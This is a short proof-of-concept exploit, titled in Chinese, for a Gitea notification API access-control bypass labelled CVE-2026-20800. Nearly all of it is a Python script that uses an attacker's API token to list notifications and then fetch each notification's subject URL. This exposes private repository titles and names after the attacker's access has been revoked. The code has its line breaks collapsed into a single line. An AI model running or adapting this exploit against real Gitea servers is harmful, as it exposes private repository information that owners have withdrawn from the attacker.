Gitea通知API权限控制漏洞导致私有仓库信息泄露

# CVE-2026-20800 PoC - Gitea Notification API Access Control Bypass # This PoC demonstrates accessing notification details after repository access revocation import requests import json GITEA_URL = "http://target-gitea-server.com" ATTACKER_TOKEN = "your_attacker_access_token" def get_notifications(): """Get list of notifications for the attacker""" headers = { "Authorization": f"token {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Get all notifications response = requests.get( f"{GITEA_URL}/api/v1/notifications", headers=headers ) if response.status_code == 200: return response.json() return [] def get_notification_details(notification_url): """Get notification details - vulnerable endpoint""" headers = { "Authorization": f"token {ATTACKER_TOKEN}", "Content-Type": "application/json" } # This endpoint does not re-validate repository access permissions response = requests.get( f"{GITEA_URL}{notification_url}", headers=headers ) if response.status_code == 200: return response.json() return None def main(): print("[*] CVE-2026-20800 PoC - Gitea Notification API Access Control Bypass") print("[*] Target:", GITEA_URL) # Step 1: Get notifications print("\n[1] Fetching notifications...") notifications = get_notifications() if not notifications: print("[-] No notifications found or authentication failed") return print(f"[+] Found {len(notifications)} notifications") # Step 2: Access notification details (even after access revocation) print("\n[2] Accessing notification details (bypassing revoked permissions)...") for notif in notifications: subject_url = notif.get("subject_url") if subject_url: details = get_notification_details(subject_url) if details: print(f"\n[+] Notification Details:") print(f" Subject: {details.get('title', 'N/A')}") print(f" Type: {details.get('type', 'N/A')}") print(f" Repository: {details.get('repository', {}).get('full_name', 'N/A')}") if __name__ == "__main__": main()